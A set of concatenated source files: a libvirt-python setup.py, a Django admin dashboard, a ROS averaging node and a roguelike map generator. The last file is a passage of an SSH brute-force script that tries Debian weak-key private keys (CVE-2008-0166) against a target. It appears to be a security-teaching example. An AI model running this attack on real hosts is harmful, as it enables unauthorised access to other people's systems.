from distutils.errors import DistutilsExecError
import distutils
import sys
import os
import os.path
import re
import time
MIN_LIBVIRT = "0.9.11"
MIN_LIBVIRT_LXC = "1.0.2"
# Hack to stop 'pip install' failing with error
# about missing 'build' dir.
if not os.path.exists("build"):
os.mkdir("build")
_pkgcfg = -1
def get_pkgcfg(do_fail=True):
global _pkgcfg
if _pkgcfg == -1:
_pkgcfg = distutils.spawn.find_executable("pkg-config")
if _pkgcfg is None and do_fail:
raise Exception("pkg-config binary is required to compile libvirt-python")
return _pkgcfg
def check_minimum_libvirt_version():
spawn([get_pkgcfg(),
"--print-errors",
"--atleast-version=%s" % MIN_LIBVIRT,
"libvirt"])
def have_libvirt_lxc():
try:
spawn([get_pkgcfg(),
"--atleast-version=%s" % MIN_LIBVIRT_LXC,
"libvirt"])
return True
except DistutilsExecError:
return False
def get_pkgconfig_data(args, mod, required=True):
"""Run pkg-config to and return content associated with it"""
f = os.popen("%s %s %s" % (get_pkgcfg(), " ".join(args), mod))
line = f.readline()
if line is not None:
line = line.strip()
if line is None or line == "":
if required:
raise Exception("Cannot determine '%s' from libvirt pkg-config file" % " ".join(args))
else:
return ""
return line
def get_api_xml_files():
"""Check with pkg-config that libvirt is present and extract
the API XML file paths we need from it"""
libvirt_api = get_pkgconfig_data(["--variable", "libvirt_api"], "libvirt")
offset = libvirt_api.index("-api.xml")
libvirt_qemu_api = libvirt_api[0:offset] + "-qemu-api.xml"
offset = libvirt_api.index("-api.xml")
libvirt_lxc_api = libvirt_api[0:offset] + "-lxc-api.xml"
return (libvirt_api, libvirt_qemu_api, libvirt_lxc_api)
def get_module_lists():
"""
Determine which modules we are actually building, and all their
required config
"""
if get_pkgcfg(do_fail=False) is None:
return [], []
c_modules = []
py_modules = []
ldflags = get_pkgconfig_data(["--libs-only-L"], "libvirt", False)
cflags = get_pkgconfig_data(["--cflags"], "libvirt", False)
module = Extension('libvirtmod',
sources = ['libvirt-override.c', 'build/libvirt.c', 'typewrappers.c', 'libvirt-utils.c'],
libraries = [ "virt" ],
include_dirs = [ "." ])
if cflags != "":
module.extra_compile_args.append(cflags)
if ldflags != "":
module.extra_link_args.append(ldflags)
c_modules.append(module)
py_modules.append("libvirt")
moduleqemu = Extension('libvirtmod_qemu',
sources = ['libvirt-qemu-override.c', 'build/libvirt-qemu.c', 'typewrappers.c', 'libvirt-utils.c'],
libraries = [ "virt-qemu" ],
include_dirs = [ "." ])
if cflags != "":
moduleqemu.extra_compile_args.append(cflags)
if ldflags != "":
moduleqemu.extra_link_args.append(ldflags)
c_modules.append(moduleqemu)
py_modules.append("libvirt_qemu")
if have_libvirt_lxc():
modulelxc = Extension('libvirtmod_lxc',
sources = ['libvirt-lxc-override.c', 'build/libvirt-lxc.c', 'typewrappers.c', 'libvirt-utils.c'],
libraries = [ "virt-lxc" ],
include_dirs = [ "." ])
if cflags != "":
modulelxc.extra_compile_args.append(cflags)
if ldflags != "":
modulelxc.extra_link_args.append(ldflags)
c_modules.append(modulelxc)
py_modules.append("libvirt_lxc")
return c_modules, py_modules
###################
# Custom commands #
###################
class my_build(build):
def run(self):
check_minimum_libvirt_version()
apis = get_api_xml_files()
self.spawn([sys.executable, "generator.py", "libvirt", apis[0]])
self.spawn([sys.executable, "generator.py", "libvirt-qemu", apis[1]])
if have_libvirt_lxc():
self.spawn([sys.executable, "generator.py", "libvirt-lxc", apis[2]])
build.run(self)
class my_sdist(sdist):
user_options = sdist.user_options
description = "Update libvirt-python.spec; build sdist-tarball."
def initialize_options(self):
self.snapshot = None
sdist.initialize_options(self)
def finalize_options(self):
if self.snapshot is not None:
self.snapshot = 1
sdist.finalize_options(self)
def gen_rpm_spec(self):
f1 = open('libvirt-python.spec.in', 'r')
f2 = open('libvirt-python.spec', 'w')
for line in f1:
f2.write(line
.replace('@PY_VERSION@', self.distribution.get_version())
.replace('@C_VERSION@', MIN_LIBVIRT))
f1.close()
f2.close()
def gen_authors(self):
f = os.popen("git log --pretty=format:'%aN <%aE>'")
authors = []
for line in f:
line = " " + line.strip()
if line not in authors:
authors.append(line)
authors.sort(key=str.lower)
f1 = open('AUTHORS.in', 'r')
f2 = open('AUTHORS', 'w')
for line in f1:
f2.write(line.replace('@AUTHORS@', "\n".join(authors)))
f1.close()
f2.close()
def gen_changelog(self):
f1 = os.popen("git log '--pretty=format:%H:%ct %an <%ae>%n%n%s%n%b%n'")
f2 = open("ChangeLog", 'w')
for line in f1:
m = re.match(r'([a-f0-9]+):(\d+)\s(.*)', line)
if m:
t = time.gmtime(int(m.group(2)))
f2.write("%04d-%02d-%02d %s\n" % (t.tm_year, t.tm_mon, t.tm_mday, m.group(3)))
else:
if re.match(r'Signed-off-by', line):
continue
f2.write(" " + line.strip() + "\n")
f1.close()
f2.close()
def run(self):
if not os.path.exists("build"):
os.mkdir("build")
if os.path.exists(".git"):
try:
self.gen_rpm_spec()
self.gen_authors()
self.gen_changelog()
sdist.run(self)
finally:
files = ["libvirt-python.spec",
"AUTHORS",
"ChangeLog"]
for f in files:
if os.path.exists(f):
os.unlink(f)
else:
sdist.run(self)
class my_rpm(Command):
user_options = []
description = "Build src and noarch rpms."
def initialize_options(self):
pass
def finalize_options(self):
pass
def run(self):
"""
Run sdist, then 'rpmbuild' the tar.gz
"""
self.run_command('sdist')
self.spawn(["/usr/bin/rpmbuild", "-ta", "--clean",
"dist/libvirt-python-%s.tar.gz" % self.distribution.get_version()])
class my_test(Command):
user_options = [
('build-base=', 'b',
"base directory for build library"),
('build-platlib=', None,
"build directory for platform-specific distributions"),
('plat-name=', 'p',
"platform name to build for, if supported "
"(default: %s)" % get_platform()),
]
description = "Run test suite."
def initialize_options(self):
self.build_base = 'build'
self.build_platlib = None
self.plat_name = None
def finalize_options(self):
if self.plat_name is None:
self.plat_name = get_platform()
plat_specifier = ".%s-%s" % (self.plat_name, sys.version[0:3])
if hasattr(sys, 'gettotalrefcount'):
plat_specifier += '-pydebug'
if self.build_platlib is None:
self.build_platlib = os.path.join(self.build_base,
'lib' + plat_specifier)
def run(self):
"""
Run test suite
"""
apis = get_api_xml_files()
if "PYTHONPATH" in os.environ:
os.environ["PYTHONPATH"] = self.build_platlib + ":" + os.environ["PYTHONPATH"]
else:
os.environ["PYTHONPATH"] = self.build_platlib
self.spawn([sys.executable, "sanitytest.py", self.build_platlib, apis[0]])
self.spawn([sys.executable, "/usr/bin/nosetests"])
class my_clean(clean):
def run(self):
clean.run(self)
if os.path.exists("build"):
remove_tree("build")
##################
# Invoke setup() #
##################
_c_modules, _py_modules = get_module_lists()
setup(name = 'libvirt-python',
version = '1.2.17',
url = 'http://www.libvirt.org',
maintainer = 'Libvirt Maintainers',
maintainer_email = '[email protected]',
description = 'The libvirt virtualization API',
ext_modules = _c_modules,
py_modules = _py_modules,
package_dir = {
'': 'build'
},
cmdclass = {
'build': my_build,
'clean': my_clean,
'sdist': my_sdist,
'rpm': my_rpm,
'test': my_test
},
classifiers = [
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"License :: OSI Approved :: GNU Lesser General Public License v2 or later (LGPLv2+)",
"Programming Language :: Python",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 3",
]
)
| gpl-2.0 | -9,192,808,951,975,738,000 | 28.513274 | 127 | 0.545527 | false |
mennanov/django-blueprint | project_name/dashboard.py | 1 | 3076 | """
This file was generated with the customdashboard management command and
contains the class for the main dashboard.
To activate your index dashboard add the following to your settings.py::
GRAPPELLI_INDEX_DASHBOARD = '{{ project_name }}.dashboard.CustomIndexDashboard'
"""
from django.utils.translation import ugettext_lazy as _
from django.core.urlresolvers import reverse
from grappelli.dashboard import modules, Dashboard
from grappelli.dashboard.utils import get_admin_site_name
class CustomIndexDashboard(Dashboard):
"""
Custom index dashboard for www.
"""
def init_with_context(self, context):
site_name = get_admin_site_name(context)
# append a group for "Administration" & "Applications"
self.children.append(modules.Group(
_('Group: Administration & Applications'),
column=1,
collapsible=True,
children=[
modules.AppList(
_('Applications'),
column=1,
css_classes=('collapse closed',),
exclude=('django.contrib.*',),
),
modules.AppList(
_('Administration'),
column=1,
collapsible=False,
models=('django.contrib.*',),
)
]
))
# append another link list module for "support".
self.children.append(modules.LinkList(
_('Media Management'),
column=2,
children=[
{
'title': _('FileBrowser'),
'url': '/admin/filebrowser/browse/',
'external': False,
},
]
))
# append another link list module for "support".
self.children.append(modules.LinkList(
_('Support'),
column=2,
children=[
{
'title': _('Django Documentation'),
'url': 'http://docs.djangoproject.com/',
'external': True,
},
{
'title': _('Grappelli Documentation'),
'url': 'http://packages.python.org/django-grappelli/',
'external': True,
},
{
'title': _('Grappelli Google-Code'),
'url': 'http://code.google.com/p/django-grappelli/',
'external': True,
},
]
))
# append a feed module
# self.children.append(modules.Feed(
# _('Latest Django News'),
# column=2,
# feed_url='http://www.djangoproject.com/rss/weblog/',
# limit=5
# ))
# append a recent actions module
self.children.append(modules.RecentActions(
_('Recent Actions'),
limit=20,
collapsible=False,
column=3,
))
| gpl-2.0 | 3,621,246,021,172,486,700 | 30.71134 | 83 | 0.479844 | false |
hivebio/ministat-1 | scripts/avg.py | 1 | 1025 | #!/usr/bin/env python
# license removed for brevity
import rospy
from std_msgs.msg import Float32, Int32
sumdata = 0.0
count = 0
def callback(data):
global count, sumdata
sumdata += data.data
count += 1
def listener():
global count, sumdata
pub = rospy.Publisher('avg', Float32, queue_size=10)
# In ROS, nodes are uniquely named. If two nodes with the same
    # name are launched, the previous one is kicked off. The
# anonymous=True flag means that rospy will choose a unique
# name for our 'listener' node so that multiple listeners can
# run simultaneously.
rospy.init_node('avg')
rate = rospy.Rate(10) # 10hz
rospy.Subscriber("thermistor", Int32, callback)
while not rospy.is_shutdown():
if count >= 20:
pub.publish(Float32(sumdata/count))
count = 0
sumdata = 0
rate.sleep()
# spin() simply keeps python from exiting until this node is stopped
rospy.spin()
if __name__ == '__main__':
listener()
| bsd-2-clause | -5,575,920,084,302,954,000 | 25.973684 | 72 | 0.642927 | false |
abeing/droog | droog/world.py | 1 | 26187 | # -*- coding: UTF-8 -*-
# Droog
# Copyright (C) 2015 Adam Miezianko
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
"""The Droog module for handling the world.
Location -- A class for value objects storing coordinates in the world.
World -- A class for reference objects of the World itself.
"""
import random
import logging
import math
from . import tile
from . import engine
from . import english
from . import the
LOG = logging.getLogger(__name__)
TREE_CHANCE = 0.05
ROAD_GRID_SIZE = 24
ROAD_CHANCE = 0.5
BUILDING_CHANCE = 0.42
WALL_BREAK_CHANCE = 0.12
mult = [[1, 0, 0, -1, -1, 0, 0, 1],
[0, 1, -1, 0, 0, -1, 1, 0],
[0, 1, 1, 0, 0, -1, -1, 0],
[1, 0, 0, 1, -1, 0, 0, -1]]
class Location(object):
"""The Location class represents a position on a grid."""
def __init__(self, row, col):
"""Construct a new location."""
self.row = row
self.col = col
def offset(self, delta_row, delta_col):
"""Offset the location by a given number of rows and columns."""
return Location(self.row + delta_row, self.col + delta_col)
def distance_to(self, other_loc):
"""Return the distance between another location and this one."""
delta_row = abs(other_loc.row - self.row)
delta_col = abs(other_loc.col - self.col)
return math.sqrt(delta_row * delta_row + delta_col * delta_col)
def delta_to(self, other_loc):
"""Return a delta between the other_loc and this one."""
if other_loc.row == self.row:
delta_row = 0
else:
delta_row = 1 if (other_loc.row - self.row > 0) else -1
if other_loc.col == self.col:
delta_col = 0
else:
delta_col = 1 if (other_loc.col - self.col > 0) else -1
return Location(delta_row, delta_col)
def __repr__(self):
"""Return string representation."""
return "(%r, %r)" % (self.row, self.col)
def __eq__(self, other):
"""Return True if these have the same value."""
if isinstance(other, self.__class__):
return self.__dict__ == other.__dict__
else:
return False
def __ne__(self, other):
"""Return True if these do not have the same value."""
return not self.__eq__(other)
def random_delta():
"""Return a random delta."""
return Location(random.choice([-1, 0, 1]), random.choice([-1, 0, 1]))
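# A small illustration of how these value objects compose (not used by the
# game itself; the coordinates are made up):
#   a = Location(2, 3)
#   b = a.offset(1, -1)       # Location(3, 2)
#   a.delta_to(b)             # Location(1, -1): a unit step from a towards b
#   a.distance_to(b)          # ~1.414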
class World(object):
"""Representation of the game world."""
def __init__(self, rows, cols):
"""Creates a World of the specified width, height, number of roads and
probability of intersection continuations.
The world is a grid of streets with the hero in the center.
"""
assert rows > 20
assert cols > 20
self.cols = cols
self.rows = rows
self.tiles = []
self.generator = engine.Generator()
self.generator_location = None
# The junction grid used to make this map, for logging and debugging.
self._junction_grid = None
for row in range(rows):
self.tiles.append(list())
for _ in range(cols):
self.tiles[row].append(tile.make_empty())
self.hero_location = self._position_hero()
self.cell(self.hero_location).creature = the.hero
self._generate()
self.do_fov()
self.visible_monsters = []
self.monster_count = 0
self.dead_monsters = []
def is_empty(self, loc):
"""Returns True if the location is empty."""
return self.cell(loc).transparent
def is_valid_location(self, loc):
"""Return true if this location is in the world bounds."""
return 0 <= loc.row < self.rows and 0 <= loc.col < self.cols
def cell(self, loc):
"""Return the tile at the location."""
return self.tiles[loc.row][loc.col]
def size_in_tiles(self):
"""Return the size of the world in tiles."""
return self.rows * self.cols
def indoor_walkable_locations(self):
"""Return a list of Locations that are indoors."""
results = []
for row in xrange(self.rows):
for col in xrange(self.cols):
loc = Location(row, col)
if self.cell(loc).indoor and self.cell(loc).walkable:
results.append(loc)
return results
def outdoor_walkable_locations(self):
"""Return a list of Locations that are outside and walkable."""
results = []
for row in xrange(self.rows):
for col in xrange(self.cols):
loc = Location(row, col)
if not self.cell(loc).indoor and self.cell(loc).walkable:
results.append(loc)
return results
def glyph_at(self, loc):
"""Returns the world glyph and its color at the specified location. If
the location coordinates are out of bounds, returns a shield character.
"""
if loc == self.hero_location:
return '@'
cell = self.cell(loc)
if cell.creature:
return cell.creature.glyph
if cell.items:
return cell.items[0].glyph
return cell.glyph
def description_at(self, loc):
"""Return a description of the location specified.
The description of a map location is description of the first of the
following elements at that location: monster, item, tile.
If the location is invalid, the empty string is returned.
"""
if loc == self.hero_location:
return "yourself"
if self.cell(loc).creature:
return english.indefinite_creature(self.cell(loc).creature)
if self.cell(loc).items:
return self.item_description_at(loc)
else:
return self.cell(loc).description
def item_description_at(self, loc):
"""Return a description of the items at a location."""
items_msg = ""
items = self.cell(loc).items
if items:
items_msg = "%s" % items[0].name
if len(items) > 1:
items_msg += " amongst other things."
else:
items_msg += "."
return items_msg
def move_creature(self, from_loc, delta):
"""Move a creature or hero at (y, x) by (delta_y, delta_x) and return
the action point costs of the movement or zero if the movement was not
possible.
At the moment, only single-step movement is permitted as we do not have
pathfinding implemented."""
assert delta.row < 2
assert delta.col < 2
to_loc = from_loc.offset(delta.row, delta.col)
if self.cell(to_loc).walkable:
moved_creature = self.cell(from_loc).creature
LOG.info('Moved creature %r from %r to %r', moved_creature.name,
from_loc, to_loc)
moved_creature.loc = to_loc
self.cell(from_loc).creature = None
self.cell(to_loc).creature = moved_creature
return engine.movement_cost(delta.row, delta.col)
return 0
def change_hero_loc(self, new_loc):
"""Change the hero location."""
old_loc = self.hero_location
self.hero_location = new_loc
self.cell(old_loc).creature = None
self.cell(new_loc).creature = the.hero
self.do_fov()
def move_hero(self, delta_y, delta_x):
"""Move the hero by (delta_y, delta_x)."""
old_loc = self.hero_location
new_loc = self.hero_location.offset(delta_y, delta_x)
if self.cell(new_loc).walkable:
LOG.info('Moved hero from %r to %r', old_loc, new_loc)
self.change_hero_loc(new_loc)
# If there are items in the new location, report about them in the
# message LOG.
items_msg = self.item_description_at(new_loc)
if items_msg:
the.messages.add("You see here %s" % items_msg)
return engine.movement_cost(delta_y, delta_x)
target = self.cell(new_loc).creature
if target:
return the.hero.melee_attack(target)
        # If we have a shield generator, we begin to jury-rig it.
if self.glyph_at(new_loc) == 'G':
return self.generator.deactivate()
return 0
def _position_hero(self):
"""Calculates the location for the hero.
        The hero will start in the outer ring of the map."""
rand_dist = random.uniform(self.cols / 4, self.cols / 2 - 1)
rand_dir = random.uniform(0, 359)
row = int(rand_dist * math.sin(rand_dir)) + self.rows / 2
col = int(rand_dist * math.cos(rand_dir)) + self.cols / 2
the.hero.loc = Location(row, col)
LOG.debug("Hero starts at %r.", the.hero.loc)
return Location(row, col)
def add_road(self, start_loc, delta_y, delta_x, beta):
"""Adds a road to the map
Starting at (start_y, start_x) and heading in a direction specified by
        delta_y and delta_x, draw a road until we reach the edge of the map. If
we run into another road, continue with probability beta, otherwise
stop."""
assert delta_y * delta_x == 0, 'We only support orthogonal roads.'
keep_going = True
road_loc = start_loc
while self.is_valid_location(road_loc) and keep_going:
self.tiles[road_loc.row][road_loc.col] = tile.make_street()
road_loc = road_loc.offset(delta_y, delta_x)
if self.is_valid_location(road_loc) \
and self.cell(road_loc).glyph == '#':
keep_going = random.uniform(0, 1) < beta
def _log(self):
"""Dumps the world into a file called 'world.dump'"""
with open("world.dump", "w") as dump_file:
for row in self._junction_grid:
dump_file.write("%r" % row)
for row in range(self.rows):
for col in range(self.cols):
dump_file.write(self.cell(Location(row, col)).glyph)
dump_file.write("\n")
def random_empty_location(self, near=None, attempts=5, radius=10):
"""Creates a random location on the map, or a random location on the
map near a specified location."""
while attempts > 0:
if near is None:
row = int(random.uniform(0, self.rows))
col = int(random.uniform(0, self.cols))
else:
row = int(random.triangular(low=near.row - radius,
high=near.row + radius))
col = int(random.triangular(low=near.col - radius,
high=near.col + radius))
loc = Location(row, col)
if self.is_valid_location(loc) and \
self.cell(loc).creature is None and self.cell(loc).walkable:
return loc
attempts -= 1
return None
def teleport_hero(self, near):
"""Teleports the hero to a valid location near a specified location."""
new_loc = self.random_empty_location(near)
self.change_hero_loc(new_loc)
def attempt_to_place_monster(self, monster, near=None, hidden=False):
"""Spawns a monster on the map.
The monster should already be created, place_monster only attempts to
find a suitable location on the map and place it. If a suitable
location cannot be found in one attempt, it returns False.
monster - the monster to add to the map
near - a location near which to place the monster, or None if anywhere
               in the world is eligible
hidden - whether to exclude locations visible to the hero
"""
assert monster
location = self.random_empty_location(near)
if location is None:
return False
if self.cell(location).seen and hidden:
return False
if monster is not None:
the.turn.add_actor(monster)
monster.loc = location
self.cell(location).creature = monster
LOG.info('%r placed at %r', monster, location)
self.monster_count += 1
return True
def remove_monster(self, monster):
"""Removes a monster from the map, for example when it dies."""
self.visible_monsters.remove(monster)
self.tiles[monster.loc.row][monster.loc.col].creature = None
self.monster_count -= 1
self.dead_monsters.append(monster)
def add_item(self, loc, item):
"""Add an item to a location."""
assert self.is_valid_location(loc)
self.cell(loc).items.append(item)
def get_item(self, loc):
"""Get an item from the world."""
assert self.is_valid_location(loc)
item = None
if self.cell(loc).items:
item = self.cell(loc).items.pop()
return item
def set_lit(self, loc):
"""Set the cell at loc as visible."""
self.cell(loc).seen = True
monster = self.cell(loc).creature
if monster and monster not in self.visible_monsters:
self.visible_monsters.append(monster)
def _cast_light(self, cx, cy, row, start, end, radius, xx, xy, yx, yy):
"Recursive lightcasting function"
if start < end:
return
radius_squared = radius*radius
for j in range(row, radius+1):
dx, dy = -j-1, -j
blocked = False
while dx <= 0:
dx += 1
# Translate the dx, dy coordinates into map coordinates:
X, Y = cx + dx * xx + dy * xy, cy + dx * yx + dy * yy
# l_slope and r_slope store the slopes of the left and right
# extremities of the square we're considering:
l_slope, r_slope = (dx-0.5)/(dy+0.5), (dx+0.5)/(dy-0.5)
loc = Location(Y, X)
if not self.is_valid_location(loc):
return
if start < r_slope:
continue
elif end > l_slope:
break
else:
# Our light beam is touching this square; light it:
if dx*dx + dy*dy < radius_squared:
self.set_lit(loc)
if blocked:
# we're scanning a row of blocked squares:
if not self.is_empty(loc):
new_start = r_slope
continue
else:
blocked = False
start = new_start
else:
if not self.is_empty(loc) and j < radius:
# This is a blocking square, start a child scan:
blocked = True
self._cast_light(cx, cy, j+1, start, l_slope,
radius, xx, xy, yx, yy)
new_start = r_slope
# Row is scanned; do next row unless last square was blocked:
if blocked:
break
def reset_fov(self):
"""Reset the field of view data for the map."""
for row in xrange(self.rows):
for col in xrange(self.cols):
self.tiles[row][col].seen = False
self.visible_monsters = []
def do_fov(self):
"Calculate lit squares from the given location and radius"
self.reset_fov()
for octant in range(8):
self._cast_light(self.hero_location.col, self.hero_location.row,
1, 1.0, 0.0, 10,
mult[0][octant], mult[1][octant],
mult[2][octant], mult[3][octant])
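    # Field-of-view note: do_fov uses recursive shadowcasting. Each pass of
    # _cast_light scans one of the eight octants around the hero, and the
    # `mult` matrices defined at the top of the module map octant-local
    # (dx, dy) offsets back onto map row/column coordinates.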
def _generate(self):
"""Generate the world map.
This function builds the world in several stages.
        1) Generate grasses and trees.
        2) Generate the road grid.
        3) Place the shield generator.
        4) Raise the shield border.
        5) Build the other buildings.
"""
self._generate_vegetation()
self._generate_roads()
self._generate_computer()
self._generate_shield()
self._generate_buildings()
def _generate_vegetation(self):
"""Fill the map with vegeation."""
for row in xrange(0, self.rows):
for col in xrange(0, self.cols):
if TREE_CHANCE > random.random():
self.tiles[row][col] = tile.make_tree()
else:
self.tiles[row][col] = tile.make_empty()
def _generate_roads(self):
"""Fill the map with a grid of roads."""
junction_grid = _create_junction_grid(self.rows, self.cols,
ROAD_GRID_SIZE)
self._junction_grid = junction_grid # for dumping purposes
prev_road_row = 0
road_row = ROAD_GRID_SIZE
prev_road_col = 0
road_col = ROAD_GRID_SIZE
for junction_row in junction_grid:
for junction in junction_row:
LOG.debug("Drawing junction %r", junction)
if junction[0]: # North road
LOG.debug("Drawing north road from row %d to row %d in "
"col %d", prev_road_row, road_row, road_col)
extended_prev_road_row = prev_road_row - 3
if extended_prev_road_row < 0:
extended_prev_road_row = 0
for row in xrange(extended_prev_road_row, road_row):
if self.tiles[row][road_col - 5].glyph != '*':
self.tiles[row][road_col - 5] = tile.make_empty()
if self.tiles[row][road_col - 4].glyph != '*':
self.tiles[row][road_col - 4] = tile.make_empty()
self.tiles[row][road_col - 3] = tile.make_street()
self.tiles[row][road_col - 2] = tile.make_street()
self.tiles[row][road_col - 1] = tile.make_street()
if road_col < self.cols - 1 \
and self.tiles[row][road_col].glyph != '*':
self.tiles[row][road_col + 0] = tile.make_empty()
if road_col < self.cols - 2 \
and self.tiles[row][road_col + 1].glyph != '*':
self.tiles[row][road_col + 1] = tile.make_empty()
if junction[3]: # West road
LOG.debug("Drawing west road from col %d to col %d in "
"row %d", prev_road_col, road_col, road_row)
for col in xrange(prev_road_col, road_col):
if self.tiles[road_row - 5][col].glyph != '*':
self.tiles[road_row - 5][col] = tile.make_empty()
if self.tiles[road_row - 4][col].glyph != '*':
self.tiles[road_row - 4][col] = tile.make_empty()
self.tiles[road_row - 3][col] = tile.make_street()
self.tiles[road_row - 2][col] = tile.make_street()
self.tiles[road_row - 1][col] = tile.make_street()
if road_row < self.rows - 1 \
and self.tiles[road_row][col].glyph != '*':
self.tiles[road_row][col] = tile.make_empty()
if road_row < self.rows - 2 \
and self.tiles[road_row + 1][col].glyph != '*':
self.tiles[road_row + 1][col] = tile.make_empty()
prev_road_col = road_col
road_col += ROAD_GRID_SIZE
if road_col >= self.cols:
road_col = self.cols
prev_road_row = road_row
road_row += ROAD_GRID_SIZE
if road_row >= self.rows:
road_row = self.rows
prev_road_col = 0
road_col = ROAD_GRID_SIZE
road_row = ROAD_GRID_SIZE
road_col = ROAD_GRID_SIZE
for junction_row in junction_grid:
for junction in junction_row:
if not junction[0] and not junction[3]:
self.tiles[road_row - 3][road_col - 3] = tile.make_empty()
if not junction[2] and not junction[3]:
self.tiles[road_row - 1][road_col - 3] = tile.make_empty()
if not junction[1] and not junction[2]:
self.tiles[road_row - 1][road_col - 1] = tile.make_empty()
if not junction[0] and not junction[1]:
self.tiles[road_row - 3][road_col - 1] = tile.make_empty()
road_col += ROAD_GRID_SIZE
if road_col >= self.cols:
road_col = self.cols
road_col = ROAD_GRID_SIZE
road_row += ROAD_GRID_SIZE
if road_row >= self.rows:
road_row = self.rows
def _generate_computer(self):
"""Places a shield generator in the center of the map."""
row = self.rows / 2
col = self.cols / 2
self.generator_location = Location(row, col)
self.tiles[row][col] = tile.make_shield_generator()
def _generate_shield(self):
"""Creates the shield border around the navigable map."""
for row in range(0, self.rows):
self.tiles[row][0] = tile.make_shield()
self.tiles[row][self.cols - 1] = tile.make_shield()
for col in range(self.cols):
self.tiles[0][col] = tile.make_shield()
self.tiles[self.rows - 1][col] = tile.make_shield()
def _generate_buildings(self):
"""Create buildings in some blocks."""
cell_begin_row = 0
cell_end_row = ROAD_GRID_SIZE
cell_begin_col = 0
cell_end_col = ROAD_GRID_SIZE
while cell_end_row < self.rows:
while cell_end_col < self.cols:
if random.random() < BUILDING_CHANCE:
begin = Location(cell_begin_row, cell_begin_col)
end = Location(cell_end_row, cell_end_col)
self._generate_building(begin, end)
cell_begin_col = cell_end_col
cell_end_col += ROAD_GRID_SIZE
cell_begin_row = cell_end_row
cell_end_row += ROAD_GRID_SIZE
cell_begin_col = 0
cell_end_col = ROAD_GRID_SIZE
def _generate_building(self, begin, end):
"""Create a building at the sepcified site."""
LOG.debug("Generating a building between %r and %r.", begin, end)
top = begin.row + random.randint(3, ROAD_GRID_SIZE / 3)
bottom = end.row - random.randint(6, ROAD_GRID_SIZE / 3)
left = begin.col + random.randint(3, ROAD_GRID_SIZE / 3)
right = end.col - random.randint(6, ROAD_GRID_SIZE / 3)
for row in xrange(top, bottom + 1):
for col in xrange(left, right + 1):
if row == top or row == bottom or col == left or col == right:
if WALL_BREAK_CHANCE < random.random():
self.tiles[row][col] = tile.make_wall()
else:
self.tiles[row][col] = tile.make_floor()
def _generate_random_junction(north, south, east, west):
"""Generate random junction given which roads much or must not exist.
For north, south, east, and west True means road must exist, False means
road must not exist, and None means either is okay.
"""
result = [north, south, east, west]
free_roads = []
for index in xrange(4):
if result[index] is None:
free_roads.append(index)
free_road_count = len(free_roads)
fill_road_count = 0
for _ in xrange(free_road_count):
fill_road_count += random.random() < ROAD_CHANCE
while fill_road_count > 0:
fill_road = random.choice(free_roads)
result[fill_road] = True
free_roads.remove(fill_road)
fill_road_count -= 1
road_count = 0
for road in result:
if road is True:
road_count += 1
if road_count == 1:
fill_road = random.choice(free_roads)
free_roads.remove(fill_road)
result[fill_road] = True
while free_roads:
fill_road = free_roads.pop()
result[fill_road] = False
return result
def _log_junction_grid(grid):
"""Writes the junction grid out to the log."""
LOG.debug("Junction grid")
for row in grid:
LOG.debug(row)
def _create_junction_grid(map_rows, map_cols, cell_size):
"""Create a grid of valid road intersations."""
assert cell_size < map_rows
assert cell_size < map_cols
junction_grid = []
rows = map_rows / cell_size
cols = map_cols / cell_size
LOG.debug("Creating junction grid of size %d rows by %d columns. cell"
" size is %d", rows, cols, cell_size)
for row in xrange(0, rows):
junction_grid.append([])
for col in xrange(0, cols):
north = junction_grid[row - 1][col][2] if row > 0 else None
west = junction_grid[row][col - 1][1] if col > 0 else None
junction = _generate_random_junction(north, None, None, west)
junction_grid[row].append(junction)
return junction_grid
| gpl-2.0 | 4,446,171,767,116,297,000 | 39.041284 | 79 | 0.543743 | false |
QuintilianoB/Violent-Python-examples | Chapter 2/5.debianSshWeakPK.py | 1 | 3380 | # SSH brute force with pxssh class and keyfile, based on chapter 2
# Python 3.4
"""
Another example of this script: https://www.exploit-db.com/exploits/5720/
The 32768 keys can be found here: https://github.com/g0tmi1k/debian-ssh
The exploit CVE: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0166
For this works, you must have a Debian distro with an vulnerable version of Openssl.
I've tested it with version 0.9.8g
Download links:
1 Ubuntu pkg- https://launchpad.net/ubuntu/+source/openssl/0.9.8b-2ubuntu2.1
2 Source - https://www.openssl.org/source/old/0.9.x/openssl-0.9.8b.tar.gz
"""
import pexpect
import argparse
import os
import threading
maxConnections = 5
connection_lock = threading.BoundedSemaphore(value=maxConnections)
Stop = False
Fails = 0
def connect(user, host, keyfile, release):
global Stop
global Fails
try:
# Defines what pexpect should expect as return.
perm_denied = 'Permission denied'
ssh_newkey = 'Are you sure you want to continue'
conn_closed = 'Connection closed by remote host'
# SSH connection with keyfile instead of password. If no keyfile is sent, there will be no connection.
opt = ' -o PasswordAuthentication=no'
connStr = 'ssh ' + user + '@' + host + ' -i' + keyfile + opt
# Starts a connections and reads the return.
child = pexpect.spawn(connStr)
ret = child.expect([pexpect.TIMEOUT, perm_denied,ssh_newkey, conn_closed, '$', '#'])
if ret == 2:
print("[-] Adding host to know_host file")
child.sendline('yes')
connect(user, host, keyfile, False)
elif ret == 3:
print("[-] {0}.".format(conn_closed))
Fails += 1
elif ret > 3:
print("[+] Success. {0}".format(str(keyfile)))
Stop = True
finally:
        # After the connection attempt finishes, release the semaphore slot.
if release:
connection_lock.release()
def main():
# Defines the options and the help menu.
parser = argparse.ArgumentParser(description="Simple Python SSH Brute Force with keyfile")
parser.add_argument('Target', help="Target host.")
parser.add_argument('User', help="User for ssh connection.")
parser.add_argument('KeyDir', help="Directory with private keyfiles for connection.")
# Receives the arguments sent by the user.
args = parser.parse_args()
tgtHost = args.Target
user = args.User
keyDir = args.KeyDir
# If anything is not set , prints the help menu from argparse and exits.
if tgtHost == None or user == None or keyDir == None:
print(parser.usage)
exit(0)
for keyfile in os.listdir(keyDir):
if Stop:
print("[*] Key found. Exiting.")
exit(0)
if Fails > 5:
print("[!] Too many connection errors. Exiting.")
exit(0)
